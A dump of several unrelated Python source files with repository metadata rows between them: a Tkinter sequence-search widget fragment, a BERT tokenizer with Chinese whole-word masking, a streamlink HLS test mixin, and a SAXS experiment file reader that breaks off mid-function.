pos = self.Search(self.cur_pos)
self.cur_pos = pos + 1
w = self.master
if pos != -1:
if self.highlight:
start, stop = pos, pos + len(self.pattern)
if other_strand:
w.tag_add(self.current_tag + 'R', '1.%d' % start,
'1.%s' % stop)
else:
w.tag_add(self.current_tag, '1.%d' % start, '1.%s' % stop)
w.see('1.%d' % start)
def exit(self):
"""Clean up on exit."""
for c in self.colors:
self.master.tag_remove('searched_%s' % c, 1.0, tk.END)
self.master.tag_remove('searched_%sR' % c, 1.0, tk.END)
self.destroy()
del(self)
if __name__ == '__main__':
win = tk.Tk()
xbbtools = xbb_widget.xbb_widget()
seq = 'ATGGTGTGTGTGTACGATCGCCCCCCCCAGTCGATCGATGCATCGTA'
xbbtools.insert_sequence(('Test_seq', seq))
xbbtools.search()
win.mainloop()
| 30.72549 | 79 | 0.575463 |
75d479b2e671da56a4ab026019d9566aaadd7f37 | 21,129 | py | Python | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 55 | 2021-12-10T08:47:06.000Z | 2022-03-28T09:02:15.000Z | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 106 | 2021-11-03T05:16:45.000Z | 2022-03-31T06:16:23.000Z | projects/QQP/tokenizer/bert_tokenization.py | Oneflow-Inc/libai | e473bd3962f07b1e37232d2be39c8257df0ec0f3 | [
"Apache-2.0"
] | 13 | 2021-12-29T08:12:08.000Z | 2022-03-28T06:59:45.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
import collections
import re
import sys
import unicodedata
import six
is_python3 = sys.version_info.major == 3
if is_python3:
unicode = str
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16",
"uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12",
"chinese_L-12_H-768_A-12",
]
cased_models = [
"cased_L-12_H-768_A-12",
"cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12",
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-training. If this error is wrong, please "
"just comment out this check."
% (actual_flag, init_checkpoint, model_name, case_name, opposite_flag)
)
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with open(vocab_file, "r", encoding="utf-8") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items, inv=False):
"""Converts a sequence of [tokens|ids] using the vocab.。"""
output = []
for item in items:
if not inv:
if _is_chinese_substr(item):
output.append(vocab[item[2:]] + len(vocab))
else:
output.append(vocab[item])
else:
if item > len(vocab):
output.append("##" + vocab[item - len(vocab)])
else:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids, inv=True)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True, do_chinese_wwm=False):
self.vocab = load_vocab(vocab_file) # _BertTokenizer会增加[BOS]和[EOS]
self.inv_vocab = {v: k for k, v in self.vocab.items()}
if not do_chinese_wwm:
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
else:
self.basic_tokenizer = BasicTokenizerWithChineseWWM(do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids, inv=True)
@staticmethod
def convert_tokens_to_string(tokens, clean_up_tokenization_spaces=True):
"""Converts a sequence of tokens (string) to a single string."""
def clean_up_tokenization(out_string):
"""Clean up a list of simple English tokenization artifacts
like spaces before punctuations and abreviated forms.
"""
out_string = (
out_string.replace(" .", ".")
.replace(" ?", "?")
.replace(" !", "!")
.replace(" ,", ",")
.replace(" ' ", "'")
.replace(" n't", "n't")
.replace(" 'm", "'m")
.replace(" 's", "'s")
.replace(" 've", "'ve")
.replace(" 're", "'re")
)
return out_string
text = " ".join(tokens).replace(" ##", "").strip()
if clean_up_tokenization_spaces:
clean_text = clean_up_tokenization(text)
return clean_text
else:
return text
def vocab_size(self):
return len(self.vocab)
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if (
(cp >= 0x4E00 and cp <= 0x9FFF)
or (cp >= 0x3400 and cp <= 0x4DBF) #
or (cp >= 0x20000 and cp <= 0x2A6DF) #
or (cp >= 0x2A700 and cp <= 0x2B73F) #
or (cp >= 0x2B740 and cp <= 0x2B81F) #
or (cp >= 0x2B820 and cp <= 0x2CEAF) #
or (cp >= 0xF900 and cp <= 0xFAFF)
or (cp >= 0x2F800 and cp <= 0x2FA1F) #
): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xFFFD or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
input = "有没有"
output = ["有", "##没", "##有"]
(NickPan)对中文的特殊处理:
中文的substr和原字不应该用不同的embedding,因此"有"和"##有"应该要用同样的id,
考虑到有些中文词表中本身带有中文substr,有些则没有(如bert4kreas),为了兼容
两种情况,这里统一的处理方式是将中文substr的id设置为vocab_size+id(substr.remove(##)),
然后在构建样本mask的时候再考虑。因此在wordpiece_tokenize时,不需要考虑"##有"是否在词表中,
只需要考虑"有"在词表中即可。
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr.startswith("##"):
if _is_chinese_substr(substr):
if substr[2:] in self.vocab: # 中文substr
cur_substr = substr
break
else:
if substr in self.vocab:
cur_substr = substr # 英文substr
break
else:
if substr in self.vocab: # 非substr,可以是字,也可以是整个中文词
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat in ("Cc", "Cf"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (
(cp >= 33 and cp <= 47)
or (cp >= 58 and cp <= 64)
or (cp >= 91 and cp <= 96)
or (cp >= 123 and cp <= 126)
):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
class BasicTokenizerWithChineseWWM(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.).
(nickpan)对中英混杂做了特殊处理,见_tokenize_chinese_chars
"""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
try:
import jieba
self.pre_tokenizer = lambda x: jieba.lcut(x, HMM=False)
except ImportError:
raise (ImportError("Chinese WWM need jieba"))
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character.
(nickpan)并且如果是纯中文片段,则用jieba分词,否则则保留
两边加空格的操作。
"""
output = []
piece = ""
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
piece += char
else:
chinese_words = self.pre_tokenizer(piece)
for word in chinese_words:
output.append(" ")
output.append(word)
output.append(" ")
output.append(char)
piece = ""
chinese_words = self.pre_tokenizer(piece)
for word in chinese_words:
output.append(" ")
output.append(word)
output.append(" ")
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if (
(cp >= 0x4E00 and cp <= 0x9FFF)
or (cp >= 0x3400 and cp <= 0x4DBF) #
or (cp >= 0x20000 and cp <= 0x2A6DF) #
or (cp >= 0x2A700 and cp <= 0x2B73F) #
or (cp >= 0x2B740 and cp <= 0x2B81F) #
or (cp >= 0x2B820 and cp <= 0x2CEAF) #
or (cp >= 0xF900 and cp <= 0xFAFF)
or (cp >= 0x2F800 and cp <= 0x2FA1F) #
): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xFFFD or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_substr(char):
return re.findall("##[\u4E00-\u9FA5]", char)
| 33.860577 | 84 | 0.572673 |
165b8e8c4b1a7d413d83edb7485f2b41f1ad079a | 8,977 | py | Python | tests/mixins/stream_hls.py | lijinquan123/streamlink | 1e0ff12f38df4879a704c11376b7e2a118a01e3b | [
"BSD-2-Clause"
] | 1 | 2021-07-19T17:25:11.000Z | 2021-07-19T17:25:11.000Z | tests/mixins/stream_hls.py | Inncee81/streamlink | 07029669d58a835bd05029316211343eef78ddf2 | [
"BSD-2-Clause"
] | 2 | 2021-08-06T01:59:11.000Z | 2022-01-20T08:27:45.000Z | tests/mixins/stream_hls.py | Inncee81/streamlink | 07029669d58a835bd05029316211343eef78ddf2 | [
"BSD-2-Clause"
] | 1 | 2021-08-05T12:15:07.000Z | 2021-08-05T12:15:07.000Z | import unittest
from binascii import hexlify
from collections import OrderedDict
from functools import partial
from threading import Event, Thread
import requests_mock
from streamlink import Streamlink
from streamlink.stream.hls import HLSStream, HLSStreamWriter as _HLSStreamWriter
class HLSItemBase:
path = ""
def url(self, namespace):
return "http://mocked/{namespace}/{path}".format(namespace=namespace, path=self.path)
class Playlist(HLSItemBase):
path = "playlist.m3u8"
def __init__(self, mediasequence=None, segments=None, end=False, targetduration=0, version=7):
self.items = [
Tag("EXTM3U"),
Tag("EXT-X-VERSION", int(version)),
Tag("EXT-X-TARGETDURATION", int(targetduration))
]
if mediasequence is not None: # pragma: no branch
self.items.append(Tag("EXT-X-MEDIA-SEQUENCE", int(mediasequence)))
self.items += segments or []
if end:
self.items.append(Tag("EXT-X-ENDLIST"))
def build(self, *args, **kwargs):
return "\n".join([item.build(*args, **kwargs) for item in self.items])
class Tag(HLSItemBase):
def __init__(self, name, attrs=None):
self.name = name
self.attrs = attrs
@classmethod
def val_quoted_string(cls, value):
return "\"{0}\"".format(value)
@classmethod
def val_hex(cls, value):
return "0x{0}".format(hexlify(value).decode("ascii"))
def build(self, *args, **kwargs):
attrs = None
if type(self.attrs) == dict:
attrs = ",".join([
"{0}={1}".format(key, value(self, *args, **kwargs) if callable(value) else value)
for (key, value) in self.attrs.items()
])
elif self.attrs is not None:
attrs = str(self.attrs)
return "#{name}{attrs}".format(name=self.name, attrs=":{0}".format(attrs) if attrs else "")
class Segment(HLSItemBase):
def __init__(self, num, title=None, duration=None, path_relative=True):
self.num = int(num or 0)
self.title = str(title or "")
self.duration = float(duration or 1)
self.path_relative = bool(path_relative)
self.content = "[{0}]".format(self.num).encode("ascii")
@property
def path(self):
return "segment{0}.ts".format(self.num)
def build(self, namespace):
return "#EXTINF:{duration:.3f},{title}\n{path}".format(
duration=self.duration,
title=self.title,
path=self.path if self.path_relative else self.url(namespace)
)
class EventedHLSStreamWriter(_HLSStreamWriter):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.write_wait = Event()
self.write_done = Event()
self.write_error = None
def write(self, *args, **kwargs):
# only write once per step
self.write_wait.wait()
self.write_wait.clear()
try:
# don't write again during teardown
if not self.closed:
super().write(*args, **kwargs)
except Exception as err:
self.write_error = err
self.reader.close()
finally:
# notify main thread that writing has finished
self.write_done.set()
class HLSStreamReadThread(Thread):
"""
Run the reader on a separate thread, so that each read can be controlled from within the main thread
"""
def __init__(self, session, stream, *args, **kwargs):
"""
:param Streamlink session:
:param HLSStream stream:
"""
Thread.__init__(self, *args, **kwargs)
self.daemon = True
self.read_wait = Event()
self.read_once = Event()
self.read_done = Event()
self.read_all = False
self.data = []
self.error = None
self.session = session
self.stream = stream
self.reader = stream.open()
# ensure that at least one read was attempted before closing the writer thread early
# otherwise, the writer will close the reader's buffer, making it not block on read and yielding empty results
def _await_read_then_close():
self.read_once.wait(timeout=5)
return self.writer_close()
self.writer_close = self.reader.writer.close
self.reader.writer.close = _await_read_then_close
def run(self):
while not self.reader.buffer.closed:
# at least one read was attempted
self.read_once.set()
# only read once per step
self.read_wait.wait()
self.read_wait.clear()
try:
# don't read again during teardown
# if there is data left, close() was called manually, and it needs to be read
if self.reader.buffer.closed and self.reader.buffer.length == 0:
return
if self.read_all:
self.data += list(iter(partial(self.reader.read, -1), b""))
return
self.data.append(self.reader.read(-1))
except OSError as err:
self.error = err
return
finally:
# notify main thread that reading has finished
self.read_done.set()
def reset(self):
self.data[:] = []
self.error = None
class TestMixinStreamHLS(unittest.TestCase):
__stream__ = HLSStream
__readthread__ = HLSStreamReadThread
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.mocker = requests_mock.Mocker()
self.mocks = {}
self.session = None
self.stream = None
self.thread = None
def setUp(self):
super().setUp()
self.mocker.start()
def tearDown(self):
super().tearDown()
self.close_thread()
self.mocker.stop()
self.mocks.clear()
self.session = None
self.stream = None
self.thread = None
def mock(self, method, url, *args, **kwargs):
self.mocks[url] = self.mocker.request(method, url, *args, **kwargs)
def get_mock(self, item):
return self.mocks[self.url(item)]
def called(self, item):
return self.get_mock(item).called
def url(self, item):
return item.url(self.id())
def content(self, segments, prop="content", cond=None):
return b"".join([getattr(segment, prop) for segment in segments.values() if cond is None or cond(segment)])
# close read thread and make sure that all threads have terminated before moving on
def close_thread(self):
thread = self.thread
if isinstance(thread.reader.writer, EventedHLSStreamWriter):
thread.reader.writer.write_wait.set()
thread.reader.close()
thread.read_wait.set()
thread.reader.writer.join()
thread.reader.worker.join()
thread.join()
# make one write call on the write thread and wait until it has finished
def await_write(self, write_calls=1, timeout=5):
writer = self.thread.reader.writer
for _ in range(write_calls):
writer.write_wait.set()
writer.write_done.wait(timeout)
writer.write_done.clear()
if writer.write_error:
raise writer.write_error
# make one read call on the read thread and wait until it has finished
def await_read(self, read_all=False, timeout=5):
thread = self.thread
thread.read_all = read_all
thread.read_wait.set()
thread.read_done.wait(timeout)
thread.read_done.clear()
try:
if thread.error:
raise thread.error
return b"".join(thread.data)
finally:
thread.reset()
def get_session(self, options=None, *args, **kwargs):
return Streamlink(options)
# set up HLS responses, create the session and read thread and start it
def subject(self, playlists, options=None, streamoptions=None, threadoptions=None, *args, **kwargs):
# filter out tags and duplicate segments between playlist responses while keeping index order
segments_all = [item for playlist in playlists for item in playlist.items if isinstance(item, Segment)]
segments = OrderedDict([(segment.num, segment) for segment in segments_all])
self.mock("GET", self.url(playlists[0]), [{"text": pl.build(self.id())} for pl in playlists])
for segment in segments.values():
self.mock("GET", self.url(segment), content=segment.content)
self.session = self.get_session(options, *args, **kwargs)
self.stream = self.__stream__(self.session, self.url(playlists[0]), **(streamoptions or {}))
self.thread = self.__readthread__(self.session, self.stream, **(threadoptions or {}))
self.thread.start()
return self.thread, segments
| 33.621723 | 118 | 0.606439 |
a206535b45dc6caa78816eab68b6a1b1b1654290 | 9,080 | py | Python | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | scripts/saxs_open.py | cristina-mt/biosoft_SAXS | 1d4f4dea5dfb5ef57089e5450a2f3504547c0f24 | [
"MIT"
] | null | null | null | """
Group of functions to read and display raw data generated from SAXS experiments at the ESRF
- poni file: calibration information
- mask file: identifies the detector lines and beam stopper
- edf file: contains the saxs data
Notes:
- Mask is read either from txt file generated with matlab code, or edf file.
- EDF file is read in the simplest form possible. Adapted from the matlab code by the saxs team.
It's possible it doesn't read all the files. If this is true, more options need to be added
Created on Fri Nov 24 2017
Last modification on Mon Jan 8 2018
version: 0.0
@author: Cristina MT
"""
class OpenSAXS():
"""
Opens the different types of data generated from SAXS experiments:
- poni file (.poni) : can be read in a text editor
- mask file (.msk): binary file, in bits
- edf file (.edf) : header text + data in binary format, bytes
"""
def read_poni(filename):
"""
Defines function to read the poni file whose name is [filename]
[filename] is a string variable containing the full path of the file,
including the file extension
Output: [cal_info] dictionary containing the calibration information
Typically, it contains the following keys:
- PixelSize1 , PixelSize2
- Distance
- Poni1 , Poni2
- Rot1 , Rot2 , Rot3 (not used)
- Wavelength
Note: 1 refers to X axis, 2 refers to Y axis
"""
cal_info = dict()
try:
with open(filename, 'r') as f:
file_data = f.readlines() # Read and store all file content at once
for line in file_data:
if line[0] != '#': # Discard the comment lines
ind_sep = line.find(':') # ':' delimits the key name, and its value
if ind_sep > 0: # make sure it's a variable, and not blank
key_name = line[0:ind_sep]
key_value = line[ind_sep+2:-1]
cal_info[key_name] = key_value
except FileNotFoundError: print('Error File Does Not Exist: '+filename)
return cal_info
def read_mask_msk(filename):
"""
Defines function to read the mask file whose name is [filename]
[filename] is a string variable containing the full path of the file,
including the file extension
Output: [mask] numpy 2D array with 0|1 values
Warning: do not use! issue with reading file as bits
- arbitrary offsets? to be checked
note: adapted from B.Vos CreateMask matlab code
(matlab does have a bultin function to read bits)
"""
import numpy as np
mask_bytes = np.fromfile(filename, 'uint8') # smallest info numpy reads is bytes
mask_bits = np.unpackbits(mask_bytes) # convert bytes to bits
# Arbitrary offsets, obtained by trial/error to match SAXS data array shape
xo = 11 ; yo = 8
offset = (1043+yo)*(981+xo)
# Reshape the string of bits into a 2D array
mask = mask_bits[245:245+offset].reshape([1043+yo, 981+xo])[yo:,xo:]
return mask
def read_mask_txt(filename):
"""
Defines function to read the mask file whose name is [filename]
[filename] is a string variable containing the full path of the file,
including the file extension
Important: Mask should be in txt format
Output: [mask] numpy 2D array with 0|1 values
"""
import numpy as np
mask_raw = np.loadtxt(filename, delimiter = ',') # mask in txt is saved with xy inverted
mask = mask_raw.transpose()
return mask
def read_mask_edf(filename):
"""
Defines function to read the mask file whose name is [filename]
[filename] is a string variable containing the full path of the file,
including the file extension
Important: Mask should be in edf format
Output: [mask] numpy 2D array with 0|1 values
"""
import numpy as np
mask_bytes = np.fromfile(filename, 'uint8') # mask is saved as unsigned byte
offset = 1024 # Arbitrary offset, obtained by trial/error to match SAXS data array shape
mask = mask_bytes[offset:].reshape(1043, 981) # Reshape the string of bytes into a 2D array
return mask
def read_edf(filename):
"""
Defines function to read the edf file whose name is [filename]
[filename] is a string variable containing the full path of the file,
including the file extension
Output:
[header_info] dictionary with all the information in file header
[image] numpy 2D array containing the SAXS data
"""
import numpy as np
import codecs
header_info = dict()
image = []
try:
read_line = 1 # Variable used to stop reading file when header is finished.
# Reads file line by line to extract information from the header.
with codecs.open(filename, "r",encoding='utf-8', errors='replace') as f:
f.readline()
while read_line == 1:
line = f.readline()
ind_sep = line.find('=') # '=' delimits the key name from its value.
if ind_sep > 0: # make sure there's a variable, and not empty/binary.
key_name = line[0:ind_sep-1]
key_value = line[ind_sep+2:-3]
header_info[key_name] = key_value
else: read_line = 0 # if '=' is not found, the header is over, stop reading.
# Read the file into a numpy array.
if header_info.get('DataType') == 'SignedInteger': # Condition extracted from matlab code. There are other options available.
dt = 'int32'
data = np.fromfile(filename,
dtype = dt,
count = int(header_info['Size'])) # Read the file as [dt] type, stop when the [Size] reported in header is reached.
# Get XY dimensions for the 2D array
xdim = int(header_info.get('Dim_1'))
ydim = int(header_info.get('Dim_2'))
# Reshape the 1D array into correct dimensions. The 512 offset is arbitrary obtained by trial/error
image = data[512:].reshape(ydim, xdim)
else: print('['+header_info.get('DataType')+'] data type not known') # If the data type is not 'SignedInteger', but header can be read
except FileNotFoundError: print('Error File Does Not Exist: '+filename)
return image, header_info
class ShowSAXS():
"""
Displays the different types of raw data read with OpenSAXS class:
- mask: binary array
- image: SAXS data array
Note: Each time a function is called, it creates a new figure
"""
def raw_img(saxs_image, vmin = None, vmax = None,
show_center = None, log_scale = None, colormap = None):
"""
Defines function that shows the raw SAXS data image contained in the [saxs_image]
2D numpy array.
[vmin] is the value minimum for the colorscale. By default is the minimum of the array
[vmax] same as [vmin] but for the maximum value
[show_center] is an array [x,y] . If 'None' , it doesn't show the center of the beam
[log_scale] By default it applies the np.log of SAXS data. Use False to prevent this
[colormap] By default is 'inferno'. Accepts any other matplotlib colormap name as a string
"""
import numpy as np
import matplotlib.pyplot as plt
plt.figure()
# Configure display according to options
if log_scale == None: image = np.log(saxs_image)
elif log_scale == False: image = 1.*saxs_image
if colormap == None: cmap_choice = 'inferno'
else: cmap_choice = colormap
if vmin == None: v1 = np.min(image.flatten())
else: v1 = vmin
if vmax == None: v2 = np.max(image.flatten())
else: v2 = vmax
# Plot image and center, if applicable
plt.imshow(image,
cmap = cmap_choice,
interpolation = 'none',
vmin = v1, vmax = v2)
if show_center != None:
plt.plot([0, image.shape[1]],[show_center[1], show_center[1]], '--', c = 'cyan')
plt.plot([show_center[0], show_center[0]],[0, image.shape[0]], '--', c = 'cyan')
plt.xlim([0, image.shape[1]])
plt.ylim([image.shape[0], 0])
#plt.show()
def mask(mask_array, show_center = None):
"""
Defines function that shows the [mask_array] 2D numpy array
used to discard the detector lines and beam stopper.
[show_center] is an array [x,y] . If 'None' , it doesn't show the center of the beam
"""
import matplotlib.pyplot as plt
# Plot image and center, if applicable
plt.figure();
plt.imshow(mask_array,
cmap = 'gray',
interpolation = 'none')
if show_center != None:
plt.plot([0, mask_array.shape[1]],[show_center[1], show_center[1]], '--', c = 'cyan')
plt.plot([show_center[0], show_center[0]],[0, mask_array.shape[0]], '--', c = 'cyan')
plt.xlim([0, mask_array.shape[1]])
plt.ylim([mask_array.shape[0], 0])
#plt.show()
def img_wmask(saxs_image, mask, vmin = None, vmax = None,
show_center = None, log_scale = None, colormap = None, alpha = None):
"""
Combines the function ShowSAXS.raw_img() and ShowSAXS.mask() into one,
to show the mask overlayed on the image, using [alpha] as transparecy value.
[alpha] can take values 0 - 1.0. Default is 0.5
Warning: Display might be too slow and could block python, depending on how is it running
Function to use carefully
"""
import matplotlib.pyplot as plt
#plt.ion()
ShowSAXS.raw_img(saxs_image, vmin, vmax, show_center, log_scale, colormap)
if alpha == None: a_value = 0.5
else: a_value = alpha
# manipulate the mask for diaplay purposes
